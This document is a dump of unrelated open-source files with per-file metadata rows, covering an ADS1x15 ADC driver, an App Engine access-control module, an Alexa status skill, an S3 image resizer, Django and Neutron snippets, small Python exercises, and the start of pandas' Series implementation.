print "ADS1x15: Invalid sps specified: %d, using 250sps" % sps
config |= self.spsADS1115.setdefault(sps, self.__ADS1115_REG_CONFIG_DR_250SPS)
# Set PGA/voltage range, defaults to +-6.144V
if ( (pga not in self.pgaADS1x15) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % pga
config |= self.pgaADS1x15.setdefault(pga, self.__ADS1015_REG_CONFIG_PGA_6_144V)
self.pga = pga
# Set the channel to be converted
if channel == 3:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_3
elif channel == 2:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_2
elif channel == 1:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_1
else:
config |= self.__ADS1015_REG_CONFIG_MUX_SINGLE_0
# Set 'start single-conversion' bit to begin conversions
config |= self.__ADS1015_REG_CONFIG_OS_SINGLE
# Write threshold high and low registers to the ADC
# V_digital = (2^(n-1)-1)/pga*V_analog
if (self.ic == self.__IC_ADS1015):
thresholdHighWORD = int(thresholdHigh*(2048.0/pga))
else:
thresholdHighWORD = int(thresholdHigh*(32767.0/pga))
bytes = [(thresholdHighWORD >> 8) & 0xFF, thresholdHighWORD & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_HITHRESH, bytes)
if (self.ic == self.__IC_ADS1015):
thresholdLowWORD = int(thresholdLow*(2048.0/pga))
else:
thresholdLowWORD = int(thresholdLow*(32767.0/pga))
bytes = [(thresholdLowWORD >> 8) & 0xFF, thresholdLowWORD & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_LOWTHRESH, bytes)
# Write config register to the ADC
# Once we write the ADC will convert continously and alert when things happen,
# we can read the converted values using getLastConversionResult
bytes = [(config >> 8) & 0xFF, config & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_CONFIG, bytes)
def startDifferentialComparator(self, chP, chN, thresholdHigh, thresholdLow, \
pga=6144, sps=250, \
activeLow=True, traditionalMode=True, latching=False, \
numReadings=1):
"Starts the comparator mode on the specified channel, see datasheet pg. 15. \
In traditional mode it alerts (ALERT pin will go low) when voltage exceeds \
thresholdHigh until it falls below thresholdLow (both given in mV). \
In window mode (traditionalMode=False) it alerts when voltage doesn't lie\
between both thresholds.\
In latching mode the alert will continue until the conversion value is read. \
numReadings controls how many readings are necessary to trigger an alert: 1, 2 or 4.\
Use getLastConversionResults() to read the current value (which may differ \
from the one that triggered the alert) and clear the alert pin in latching mode. \
This function starts the continuous conversion mode. The sps controls \
the sample rate and the pga the gain, see datasheet page 13. "
# Continuous mode
config = self.__ADS1015_REG_CONFIG_MODE_CONTIN
if (activeLow==False):
config |= self.__ADS1015_REG_CONFIG_CPOL_ACTVHI
else:
config |= self.__ADS1015_REG_CONFIG_CPOL_ACTVLOW
if (traditionalMode==False):
config |= self.__ADS1015_REG_CONFIG_CMODE_WINDOW
else:
config |= self.__ADS1015_REG_CONFIG_CMODE_TRAD
if (latching==True):
config |= self.__ADS1015_REG_CONFIG_CLAT_LATCH
else:
config |= self.__ADS1015_REG_CONFIG_CLAT_NONLAT
if (numReadings==4):
config |= self.__ADS1015_REG_CONFIG_CQUE_4CONV
elif (numReadings==2):
config |= self.__ADS1015_REG_CONFIG_CQUE_2CONV
else:
config |= self.__ADS1015_REG_CONFIG_CQUE_1CONV
# Set sample per seconds, defaults to 250sps
# If sps is in the dictionary (defined in init()) it returns the value of the constant
# othewise it returns the value for 250sps. This saves a lot of if/elif/else code!
if (self.ic == self.__IC_ADS1015):
if ( (sps not in self.spsADS1015) & self.debug):
print "ADS1x15: Invalid sps specified: %d, using 1600sps" % sps
config |= self.spsADS1015.setdefault(sps, self.__ADS1015_REG_CONFIG_DR_1600SPS)
else:
if ( (sps not in self.spsADS1115) & self.debug):
print "ADS1x15: Invalid sps specified: %d, using 250sps" % sps
config |= self.spsADS1115.setdefault(sps, self.__ADS1115_REG_CONFIG_DR_250SPS)
# Set PGA/voltage range, defaults to +-6.144V
if ( (pga not in self.pgaADS1x15) & self.debug):
print "ADS1x15: Invalid pga specified: %d, using 6144mV" % pga
config |= self.pgaADS1x15.setdefault(pga, self.__ADS1015_REG_CONFIG_PGA_6_144V)
self.pga = pga
# Set channels
if ( (chP == 0) & (chN == 1) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_0_1
elif ( (chP == 0) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_0_3
elif ( (chP == 2) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_2_3
elif ( (chP == 1) & (chN == 3) ):
config |= self.__ADS1015_REG_CONFIG_MUX_DIFF_1_3
else:
if (self.debug):
print "ADS1x15: Invalid channels specified: %d, %d" % (chP, chN)
return -1
# Set 'start single-conversion' bit to begin conversions
config |= self.__ADS1015_REG_CONFIG_OS_SINGLE
# Write threshold high and low registers to the ADC
# V_digital = (2^(n-1)-1)/pga*V_analog
if (self.ic == self.__IC_ADS1015):
thresholdHighWORD = int(thresholdHigh*(2048.0/pga))
else:
thresholdHighWORD = int(thresholdHigh*(32767.0/pga))
bytes = [(thresholdHighWORD >> 8) & 0xFF, thresholdHighWORD & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_HITHRESH, bytes)
if (self.ic == self.__IC_ADS1015):
thresholdLowWORD = int(thresholdLow*(2048.0/pga))
else:
thresholdLowWORD = int(thresholdLow*(32767.0/pga))
bytes = [(thresholdLowWORD >> 8) & 0xFF, thresholdLowWORD & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_LOWTHRESH, bytes)
# Write config register to the ADC
# Once we write the ADC will convert continously and alert when things happen,
# we can read the converted values using getLastConversionResult
bytes = [(config >> 8) & 0xFF, config & 0xFF]
self.i2c.writeList(self.__ADS1015_REG_POINTER_CONFIG, bytes)
| gpl-3.0 | 1,737,550,240,136,467,500 | 43.305785 | 138 | 0.650407 | false |
lugkhast/forever-alone-gae | core/privileges.py | 1 | 3131 | # forever-alone: A course and free time matching web app for college students
# Copyright (C) 2011 Lawrence Patrick Calulo
#
# This file is part of forever-alone.
#
# forever-alone is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# forever-alone is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with forever-alone. If not, see <http://www.gnu.org/licenses/>.
from google.appengine.api import users, memcache
from google.appengine.ext import db
from core import profiles
def make_app_status_dict(status):
statusDict = {}
statusDict['allowEveryone'] = status.allowEveryone
statusDict['allowPrivilegedUsers'] = status.allowPrivilegedUsers
return statusDict
def get_app_status_from_ds():
"""
Code that needs to modify the AppStatus should use this function.
"""
status = AppStatus.get_or_insert('app-status')
status.update_cache()
return status
def get_app_status():
"""
Code that does *not* need to modify the AppStatus should use this
function, as this only hits the datastore if the AppStatus is not
in memcache.
"""
namespace = 'app-status'
statusDict = memcache.get('status-dict', namespace=namespace)
if statusDict:
status = AppStatus()
status.from_dict(statusDict)
return status
return get_app_status_from_ds()
def can_access_page():
if users.is_current_user_admin():
return True
# Everyone must be allowed before new users can register
# Registering only to find that you're locked out at the moment
# probably won't be very good.
status = get_app_status()
profile = profiles.get_user_profile()
if not profile:
# If the user does not have a profile, his ability to access
# pages will be determined by the state of allowEveryone
return status.allowEveryone
if status.allowEveryone:
return True
elif profile.isPrivilegedUser and status.allowPrivilegedUsers:
return True
return False
def get_redirect_url():
return '/errors/locked.html'
class AppStatus(db.Model):
allowEveryone = db.BooleanProperty()
allowPrivilegedUsers = db.BooleanProperty()
def allow_everyone(self):
self.allowEveryone = True
self.allowPrivilegedUsers = True
self._save()
def privileged_and_admins_only(self):
self.allowEveryone = False
self.allowPrivilegedUsers = True
self._save()
def admins_only(self):
self.allowEveryone = False
self.allowPrivilegedUsers = False
self._save()
def from_dict(self, statusDict):
self.allowEveryone = statusDict['allowEveryone']
self.allowPrivilegedUsers = statusDict['allowPrivilegedUsers']
def update_cache(self):
memcache.set('status-dict', make_app_status_dict(self), namespace='app-status')
def _save(self):
self.update_cache()
self.put()
| agpl-3.0 | 9,016,858,172,864,464,000 | 27.990741 | 81 | 0.75024 | false |
Signiant/alexa_signiant_status | alexa_signiant_status.py | 1 | 11159 | """
Return Signiant Platform Status
"""
import time
import urllib.request, urllib.error, urllib.parse
import json
import os
# Default Signiant Status Page URL
SIGNIANT_STATUS_URL = 'https://1dmtgkjnl3y3.statuspage.io/api/v2/summary.json'
STATUS_PAGE_API_KEY = None
# We need this to be set as an env var - fail if it's not
if 'applicationId' in os.environ:
APPLICATION_ID = os.environ['applicationId']
else:
raise ValueError("No Application ID provided")
if 'statusPageUrl' in os.environ:
SIGNIANT_STATUS_URL = os.environ['statusPageUrl']
if 'statusPageApiKey' in os.environ:
STATUS_PAGE_API_KEY = os.environ['statusPageApiKey']
def get_raw_component_status():
'''
:return: list of services with their info
'''
sig_components = []
request = urllib.request.Request(SIGNIANT_STATUS_URL)
if STATUS_PAGE_API_KEY:
request.add_header("Authorization", "OAuth %s" % STATUS_PAGE_API_KEY)
r = urllib.request.urlopen(request, timeout=2)
if r.getcode() == 200:
response = json.load(r)
if 'components' in response:
sig_components = response['components']
return sig_components
def get_signiant_status():
raw_status_list = get_raw_component_status()
# {
# "status": "operational",
# "name": "v1",
# "created_at": "2016-10-21T14:20:42.069Z",
# "updated_at": "2016-12-02T20:54:28.202Z",
# "position": 1,
# "description": "Backend services for TAPIv1",
# "group_id": "1234567890",
# "showcase": false,
# "id": "2345678901",
# "page_id": "123abc456def",
# "group": false,
# "only_show_if_degraded": false
# }
# Find the groups
groups = {}
for component in raw_status_list:
if component['group']:
groups[component['id']] = component['name']
# Get statuses
signiant_services = {}
for service in raw_status_list:
if service['group_id']:
# This is part of a group - get the group's name
name = groups[service['group_id']] + ' ' + service['name']
status = service['status']
signiant_services[name] = {'status': status}
return signiant_services
def convert_status_to_readable(status):
if 'degraded_performance' in status:
return "degraded performance"
elif 'major_outage' in status:
return "major outage"
elif 'partial_outage' in status:
return "partial outage"
elif 'under_maintenance' in status:
return "under maintenance"
else:
return status
# ------------------------------ SSML Helpers ---------------------------------
def pause(duration=1000):
return '<break time="' + str(duration) + 'ms"/>'
def say_as(interpret_as, msg):
return '<say-as interpret-as="' + interpret_as + '"> ' + str(msg) + '</say-as>'
def handle_audio(url):
return "<audio src='" + url + "' />"
# --------------- Helpers that build all of the responses ----------------------
def build_speechlet_response(title, output, card_output, reprompt_text="",
card_image_small=None, card_image_large=None,
should_end_session=False):
outputSpeech = {
'type': 'SSML',
'ssml': "<speak>" + output + "</speak>"
}
card = {}
card['title'] = title
if card_image_small or card_image_large:
card['type'] = 'Standard'
card['text'] = card_output
card['image'] = {}
if card_image_small:
card['image']['smallImageUrl'] = card_image_small
if card_image_large:
card['image']['largeImageUrl'] = card_image_large
else:
card['type'] = 'Simple'
card['content'] = card_output
reprompt = {
'outputSpeech': {
'type': 'SSML',
'ssml': "<speak>" + reprompt_text + "</speak>"
}
}
return {
'outputSpeech': outputSpeech,
'card': card,
'reprompt': reprompt,
'shouldEndSession': should_end_session
}
def build_response(session_attributes, speechlet_response):
return {
'version': '1.0',
'sessionAttributes': session_attributes,
'response': speechlet_response
}
# --------------- Functions that control the skill's behavior ------------------
def get_help_response():
card_title = "Signiant Help"
speech_output = "To request information about Signiant Platform Status, say status report" + pause() \
+ "What can I help you with?"
reprompt_text = "What can I help you with?"
return build_response({}, build_speechlet_response(
card_title, speech_output, speech_output, reprompt_text, should_end_session=False))
def get_welcome_response():
session_attributes = {}
return get_status()
def handle_session_end_request():
card_title = "Session Ended"
speech_output = "Thank you."
return build_response({}, build_speechlet_response(
card_title, speech_output, speech_output, should_end_session=True))
def general_status():
signiant_stats = get_signiant_status()
# Get the number of services
no_signiant_services = len(signiant_stats)
signiant_problems = []
for service in signiant_stats:
if not 'operational' in signiant_stats[service]['status']:
signiant_problems.append((service, signiant_stats[service]['status']))
today = time.strftime("%A %B %d %Y")
now = time.strftime("%X UTC")
card_output = "Current Signiant Platform Status report for " + today + ' at ' + now + '\n'
for service in signiant_stats:
card_output += service + ': ' + signiant_stats[service]['status'] + '\n'
card_output += "For more information, please visit status.signiant.com"
speech_output = "Current Signiant Platform Status report for " + today + pause()
if len(signiant_problems) > 0:
# We've got a problem
for service, status in signiant_problems:
speech_output += service + ' has a status of ' + convert_status_to_readable(status) + pause()
if len(signiant_problems) < no_signiant_services:
speech_output += "All other services are operating normally" + pause()
speech_output += "For more information, please visit status.signiant.com"
else:
speech_output += "All services operating normally"
return speech_output, card_output
def get_status():
session_attributes = {}
card_title = "Signiant Platform Status"
speech_output, card_output = general_status()
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, card_output, should_end_session=True))
def get_media_shuttle():
session_attributes = {}
card_title = "Signiant Media Shuttle"
speech_output = "Media Shuttle is a SaaS solution that allows anyone to quickly and securely transfer any size file anywhere in the world"
card_output = "Media Shuttle is a SaaS solution that allows anyone to quickly and securely transfer any size file anywhere in the world."
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, card_output, should_end_session=True))
def get_flight():
session_attributes = {}
card_title = "Signiant Flight"
speech_output = 'Flight is an auto scaling SaaS utility that accelerates the transfer of large files in and out of cloud object storage'
card_output = "Flight is an auto scaling SaaS utility that accelerates the transfer of large data sets into and out of cloud object storage."
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, card_output, should_end_session=True))
def get_managers_and_agents():
session_attributes = {}
card_title = "Signiant Managers+Agents"
speech_output = "Managers and Agents software enables the automated delivery of large files across geographically dispersed locations"
card_output = "Managers+Agents software enables the automated delivery of large files across geographically dispersed locations."
return build_response(session_attributes, build_speechlet_response(
card_title, speech_output, card_output, should_end_session=True))
# --------------- Events ------------------
def on_session_started(session_started_request, session):
"""
Called when the session starts
"""
print("on_session_started requestId=" + session_started_request['requestId']
+ ", sessionId=" + session['sessionId'])
def on_launch(launch_request, session):
"""
Called when the user launches the skill without specifying what they want
"""
print("on_launch requestId=" + launch_request['requestId'] +
", sessionId=" + session['sessionId'])
# Dispatch to your skill's launch
return get_welcome_response()
def on_intent(intent_request, session):
"""
Called when the user specifies an intent for this skill
"""
print("on_intent requestId=" + intent_request['requestId'] +
", sessionId=" + session['sessionId'])
intent = intent_request['intent']
intent_name = intent_request['intent']['name']
# Dispatch to your skill's intent handlers
if intent_name == "GetStatus":
return get_status()
elif intent_name == "GetMediaShuttle":
return get_media_shuttle()
elif intent_name == "GetFlight":
return get_flight()
elif intent_name == "GetManagersAndAgents":
return get_managers_and_agents()
elif intent_name == "AMAZON.HelpIntent":
return get_help_response()
elif intent_name == "AMAZON.CancelIntent" or intent_name == "AMAZON.StopIntent":
return handle_session_end_request()
else:
raise ValueError("Invalid intent")
def on_session_ended(session_ended_request, session):
"""
Called when the user ends the session.
Is not called when the skill returns should_end_session=true
"""
print("on_session_ended requestId=" + session_ended_request['requestId'] +
", sessionId=" + session['sessionId'])
# --------------- Main handler ------------------
def lambda_handler(event, context):
"""
Route the incoming request based on type (LaunchRequest, IntentRequest,
etc.) The JSON body of the request is provided in the event parameter.
"""
print("event.session.application.applicationId=" +
event['session']['application']['applicationId'])
if (event['session']['application']['applicationId'] != APPLICATION_ID):
raise ValueError("Invalid Application ID")
if event['session']['new']:
on_session_started({'requestId': event['request']['requestId']},
event['session'])
if event['request']['type'] == "LaunchRequest":
return on_launch(event['request'], event['session'])
elif event['request']['type'] == "IntentRequest":
return on_intent(event['request'], event['session'])
elif event['request']['type'] == "SessionEndedRequest":
return on_session_ended(event['request'], event['session'])
| mit | 2,951,908,603,387,607,000 | 33.441358 | 145 | 0.631419 | false |
jflitton/serverless-image-resizing | asynchronous.py | 1 | 2027 | import boto3
import cStringIO
import json
from config import Config
from PIL import Image
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor
sqs = boto3.resource('sqs')
s3 = boto3.resource('s3')
bucket = s3.Bucket(Config.s3Bucket)
message_found = True
images_resized = 0
start_time = datetime.now()
# Get the queue's URL
queue = sqs.create_queue(QueueName=Config.queueName)
def get_messages():
return queue.receive_messages(MaxNumberOfMessages=10)
def delete_messages(messages):
return queue.delete_messages(
Entries=[{'Id': message.message_id, 'ReceiptHandle': message.receipt_handle} for message in messages]
)
def process(message):
original_file_name = json.loads(message.body)['Message']
# Download the input image from S3
input_file = cStringIO.StringIO()
bucket.download_fileobj(original_file_name, input_file)
image = Image.open(input_file)
# Resize to 150x100
image.thumbnail((150,100), Image.ANTIALIAS)
# Upload the resized image to S3
resized_file = cStringIO.StringIO()
image.save(resized_file, 'png')
bucket.put_object(
Key=original_file_name + '-150.png',
Body=resized_file.getvalue()
)
print "Processed {}".format(original_file_name)
messages = get_messages()
while len(messages):
print "Batch of {} started".format(len(messages))
with ThreadPoolExecutor(max_workers=len(messages)) as tpx:
tpx.map(
lambda message: process(message), messages
)
print "Batch done!"
images_resized += len(messages)
delete_messages(messages)
messages = get_messages()
# Output the performance results
end_time = datetime.now()
print "Start time: {}".format(start_time)
print "End time: {}".format(end_time)
duration_seconds = (end_time - start_time).total_seconds()
print "Run time: {} seconds".format(duration_seconds)
print "Messages processed: {}".format(images_resized)
print "Messages per second: {}".format(images_resized/duration_seconds)
| mit | 7,370,596,085,217,829,000 | 26.391892 | 109 | 0.706463 | false |
roaet/quark | quark/api/extensions/subnets_quark.py | 1 | 1760 | # Copyright (c) 2013 Rackspace Hosting Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.api import extensions
EXTENDED_ATTRIBUTES_2_0 = {
"subnets": {
"segment_id": {"allow_post": True, "allow_put": False,
"default": None},
"ip_policy_id": {"allow_post": False, "allow_put": False,
"default": None, "is_visible": True}
}
}
class Subnets_quark(extensions.ExtensionDescriptor):
"""Extends subnets for quark API purposes.
* Shunts enable_dhcp to false
"""
@classmethod
def get_name(cls):
return "Quark Subnets API Extension"
@classmethod
def get_alias(cls):
return "subnets_quark"
@classmethod
def get_description(cls):
return "Quark Subnets API Extension"
@classmethod
def get_namespace(cls):
return ("http://docs.openstack.org/api/openstack-network/2.0/content/"
"Subnets.html")
@classmethod
def get_updated(cls):
return "2013-04-22T10:00:00-00:00"
def get_extended_resources(self, version):
if version == "2.0":
return EXTENDED_ATTRIBUTES_2_0
else:
return {}
| apache-2.0 | 6,089,075,658,689,884,000 | 28.830508 | 78 | 0.634659 | false |
byplacebo/head-first-python | 6th/class_coach2.py | 1 | 1120 | def sanitize(time_string):
if "-" in time_string:
splitter = "-"
elif ":" in time_string:
splitter = ":"
else:
return time_string
(mins, secs) = time_string.split(splitter)
return mins + "." + secs
class Athlete:
def __init__(self, a_name, a_dob=None, a_times=[]):
self.name = a_name
self.dob = a_dob
self.times = a_times
def top3(self):
return sorted(set(sanitize(t) for t in self.times))[0:3]
def add_time(self, time):
self.times.append(time)
def add_times(self, times):
self.times.extend(times)
def get_coach_data(filename):
try:
with open(filename) as f:
data = f.readline()
templ = data.strip().split(",")
return Athlete(templ.pop(0), templ.pop(0), templ)
except IOError as err:
print("File error : " + str(err))
return None
sarah = get_coach_data("sarah2.txt")
print(sarah.name + "'s fastest times are: " + str(sarah.top3()))
james = get_coach_data("james2.txt")
print(james.name + "'s fastest times are: " + str(james.top3()))
| apache-2.0 | -7,468,122,315,685,793,000 | 25.046512 | 64 | 0.570536 | false |
TheSchwa/dnd | char_sheet/fields/text.py | 1 | 1184 | from collections import OrderedDict
from dnd.char_sheet.fields import Field
###############################################################################
# Text class
# - supports newlines via the 2 literal characters '\n'
###############################################################################
class Text(Field):
FIELDS = OrderedDict([
('name',str),
('text',str),
])
# @param name (str)
# @param text (str)
def __init__(self,name,text):
self.name = name
self.set(text)
# @param text (str)
def set(self,text):
# we store newlines internally as '\' + 'n' for ease of saving
text = text or ''
self.text = text.strip().replace('\n','\\n')
# @return (str) truncated to 50 characters and replacing newlines with '|'
def __str__(self):
text = '[BLANK]' if not self.text else self.text.replace('\\n',' | ')
ellip = ''
if len(text)>50:
(text,ellip) = (text[:50],'...')
return '%s: %s%s' % (self.name,text,ellip)
# @return (str) full text with real newlines
def str_all(self):
text = '[BLANK]' if not self.text else self.text
return '--- %s\n%s' % (self.name,text.replace('\\n','\n'))
| gpl-3.0 | 4,237,716,498,768,581,600 | 25.909091 | 79 | 0.511824 | false |
arteria/django-copywriting | copywriting/urls.py | 1 | 1053 | from compat import patterns, url
urlpatterns = patterns('copywriting',
url(r'^author/(?P<author>\w[^/]+)$', 'views.listArticlesByAuthor'),
url(r'^author/(?P<author>\w[^/]+)/$', 'views.listArticlesByAuthor', name='copywriting_by_author'),
url(r'^tag/(?P<in_tag>\w[^/]+)$', 'views.withTag'),
url(r'^tag/(?P<in_tag>\w[^/]+)/$', 'views.withTag', name='copywriting_by_tag'),
# (r'^(?P<year>\d+)/(?P<month>\d+)/(?P<day>\d+)/$', 'views.listBlogEntriesByYearMonthDay'),
url(r'^(?P<requestYear>\d+)/(?P<requestMonth>\d+)/$', 'views.listArticlesByYearMonth', name='copywriting_by_month'),
url(r'^(?P<requestYear>\d+)/$', 'views.listArticlesByYear', name='copywriting_by_year'),
url(r'^(?P<slug>[^\.]+)/$', 'views.showArticle', name='copywriting_article'),
url('^$', 'views.listArticles', name='copywriting_index'),
)
try:
from .feed import blogFeed
urlpatterns += patterns('copywriting',
url(r'^feed\.rss$', blogFeed()),
url(r'^feed/$', blogFeed()),
)
except Exception, ex:
print ex
pass
| mit | 4,051,932,310,077,401,000 | 42.875 | 120 | 0.605888 | false |
kushalbhola/MyStuff | Practice/PythonApplication/env/Lib/site-packages/pandas/core/series.py | 1 | 150775 | """
Data structure for 1-dimensional cross-sectional and time series data
"""
from collections import OrderedDict
from io import StringIO
from shutil import get_terminal_size
from textwrap import dedent
from typing import Any, Callable
import warnings
import numpy as np
from pandas._config import get_option
from pandas._libs import iNaT, index as libindex, lib, reshape, tslibs
from pandas.compat import PY36
from pandas.compat.numpy import function as nv
from pandas.util._decorators import Appender, Substitution, deprecate
from pandas.util._validators import validate_bool_kwarg
from pandas.core.dtypes.common import (
_is_unorderable_exception,
ensure_platform_int,
is_bool,
is_categorical,
is_categorical_dtype,
is_datetime64_dtype,
is_datetimelike,
is_dict_like,
is_extension_array_dtype,
is_extension_type,
is_hashable,
is_integer,
is_iterator,
is_list_like,
is_object_dtype,
is_scalar,
is_string_like,
is_timedelta64_dtype,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCDatetimeArray,
ABCDatetimeIndex,
ABCSeries,
ABCSparseArray,
ABCSparseSeries,
)
from pandas.core.dtypes.missing import (
is_valid_nat_for_dtype,
isna,
na_value_for_dtype,
notna,
remove_na_arraylike,
)
import pandas as pd
from pandas.core import algorithms, base, generic, nanops, ops
from pandas.core.accessor import CachedAccessor, DirNamesMixin
from pandas.core.arrays import ExtensionArray, SparseArray
from pandas.core.arrays.categorical import Categorical, CategoricalAccessor
from pandas.core.arrays.sparse import SparseAccessor
import pandas.core.common as com
from pandas.core.index import (
Float64Index,
Index,
InvalidIndexError,
MultiIndex,
ensure_index,
)
from pandas.core.indexers import maybe_convert_indices
from pandas.core.indexes.accessors import CombinedDatetimelikeProperties
import pandas.core.indexes.base as ibase
from pandas.core.indexes.datetimes import DatetimeIndex
from pandas.core.indexes.period import PeriodIndex
from pandas.core.indexes.timedeltas import TimedeltaIndex
from pandas.core.indexing import check_bool_indexer
from pandas.core.internals import SingleBlockManager
from pandas.core.internals.construction import sanitize_array
from pandas.core.strings import StringMethods
from pandas.core.tools.datetimes import to_datetime
import pandas.io.formats.format as fmt
import pandas.plotting
__all__ = ["Series"]
_shared_doc_kwargs = dict(
axes="index",
klass="Series",
axes_single_arg="{0 or 'index'}",
axis="""axis : {0 or 'index'}
Parameter needed for compatibility with DataFrame.""",
inplace="""inplace : boolean, default False
If True, performs operation inplace and returns None.""",
unique="np.ndarray",
duplicated="Series",
optional_by="",
optional_mapper="",
optional_labels="",
optional_axis="",
versionadded_to_excel="\n .. versionadded:: 0.20.0\n",
)
# see gh-16971
def remove_na(arr):
"""
Remove null values from array like structure.
.. deprecated:: 0.21.0
Use s[s.notnull()] instead.
"""
warnings.warn(
"remove_na is deprecated and is a private " "function. Do not use.",
FutureWarning,
stacklevel=2,
)
return remove_na_arraylike(arr)
def _coerce_method(converter):
"""
Install the scalar coercion methods.
"""
def wrapper(self):
if len(self) == 1:
return converter(self.iloc[0])
raise TypeError("cannot convert the series to " "{0}".format(str(converter)))
wrapper.__name__ = "__{name}__".format(name=converter.__name__)
return wrapper
# ----------------------------------------------------------------------
# Series class
class Series(base.IndexOpsMixin, generic.NDFrame):
"""
One-dimensional ndarray with axis labels (including time series).
Labels need not be unique but must be a hashable type. The object
supports both integer- and label-based indexing and provides a host of
methods for performing operations involving the index. Statistical
methods from ndarray have been overridden to automatically exclude
missing data (currently represented as NaN).
Operations between Series (+, -, /, *, **) align values based on their
associated index values-- they need not be the same length. The result
index will be the sorted union of the two indexes.
Parameters
----------
data : array-like, Iterable, dict, or scalar value
Contains data stored in Series.
.. versionchanged :: 0.23.0
If data is a dict, argument order is maintained for Python 3.6
and later.
index : array-like or Index (1d)
Values must be hashable and have the same length as `data`.
Non-unique index values are allowed. Will default to
RangeIndex (0, 1, 2, ..., n) if not provided. If both a dict and index
sequence are used, the index will override the keys found in the
dict.
dtype : str, numpy.dtype, or ExtensionDtype, optional
Data type for the output Series. If not specified, this will be
inferred from `data`.
See the :ref:`user guide <basics.dtypes>` for more usages.
copy : bool, default False
Copy input data.
"""
_metadata = ["name"]
_accessors = {"dt", "cat", "str", "sparse"}
# tolist is not actually deprecated, just suppressed in the __dir__
_deprecations = (
generic.NDFrame._deprecations
| DirNamesMixin._deprecations
| frozenset(["asobject", "reshape", "get_value", "set_value", "valid"])
| frozenset(["ftype", "real", "imag", "tolist"])
)
# Override cache_readonly bc Series is mutable
hasnans = property(
base.IndexOpsMixin.hasnans.func, doc=base.IndexOpsMixin.hasnans.__doc__
)
_data = None # type: SingleBlockManager
# ----------------------------------------------------------------------
# Constructors
def __init__(
self, data=None, index=None, dtype=None, name=None, copy=False, fastpath=False
):
# we are called internally, so short-circuit
if fastpath:
# data is an ndarray, index is defined
if not isinstance(data, SingleBlockManager):
data = SingleBlockManager(data, index, fastpath=True)
if copy:
data = data.copy()
if index is None:
index = data.index
else:
if index is not None:
index = ensure_index(index)
if data is None:
data = {}
if dtype is not None:
# GH 26336: explicitly handle 'category' to avoid warning
# TODO: Remove after CategoricalDtype defaults to ordered=False
if (
isinstance(dtype, str)
and dtype == "category"
and is_categorical(data)
):
dtype = data.dtype
dtype = self._validate_dtype(dtype)
if isinstance(data, MultiIndex):
raise NotImplementedError(
"initializing a Series from a " "MultiIndex is not supported"
)
elif isinstance(data, Index):
if name is None:
name = data.name
if dtype is not None:
# astype copies
data = data.astype(dtype)
else:
# need to copy to avoid aliasing issues
data = data._values.copy()
if isinstance(data, ABCDatetimeIndex) and data.tz is not None:
# GH#24096 need copy to be deep for datetime64tz case
# TODO: See if we can avoid these copies
data = data._values.copy(deep=True)
copy = False
elif isinstance(data, np.ndarray):
pass
elif isinstance(data, (ABCSeries, ABCSparseSeries)):
if name is None:
name = data.name
if index is None:
index = data.index
else:
data = data.reindex(index, copy=copy)
data = data._data
elif isinstance(data, dict):
data, index = self._init_dict(data, index, dtype)
dtype = None
copy = False
elif isinstance(data, SingleBlockManager):
if index is None:
index = data.index
elif not data.index.equals(index) or copy:
# GH#19275 SingleBlockManager input should only be called
# internally
raise AssertionError(
"Cannot pass both SingleBlockManager "
"`data` argument and a different "
"`index` argument. `copy` must "
"be False."
)
elif is_extension_array_dtype(data):
pass
elif isinstance(data, (set, frozenset)):
raise TypeError(
"{0!r} type is unordered" "".format(data.__class__.__name__)
)
elif isinstance(data, ABCSparseArray):
# handle sparse passed here (and force conversion)
data = data.to_dense()
else:
data = com.maybe_iterable_to_list(data)
if index is None:
if not is_list_like(data):
data = [data]
index = ibase.default_index(len(data))
elif is_list_like(data):
# a scalar numpy array is list-like but doesn't
# have a proper length
try:
if len(index) != len(data):
raise ValueError(
"Length of passed values is {val}, "
"index implies {ind}".format(val=len(data), ind=len(index))
)
except TypeError:
pass
# create/copy the manager
if isinstance(data, SingleBlockManager):
if dtype is not None:
data = data.astype(dtype=dtype, errors="ignore", copy=copy)
elif copy:
data = data.copy()
else:
data = sanitize_array(data, index, dtype, copy, raise_cast_failure=True)
data = SingleBlockManager(data, index, fastpath=True)
generic.NDFrame.__init__(self, data, fastpath=True)
self.name = name
self._set_axis(0, index, fastpath=True)
def _init_dict(self, data, index=None, dtype=None):
"""
Derive the "_data" and "index" attributes of a new Series from a
dictionary input.
Parameters
----------
data : dict or dict-like
Data used to populate the new Series
index : Index or index-like, default None
index for the new Series: if None, use dict keys
dtype : dtype, default None
dtype for the new Series: if None, infer from data
Returns
-------
_data : BlockManager for the new Series
index : index for the new Series
"""
# Looking for NaN in dict doesn't work ({np.nan : 1}[float('nan')]
# raises KeyError), so we iterate the entire dict, and align
if data:
keys, values = zip(*data.items())
values = list(values)
elif index is not None:
# fastpath for Series(data=None). Just use broadcasting a scalar
# instead of reindexing.
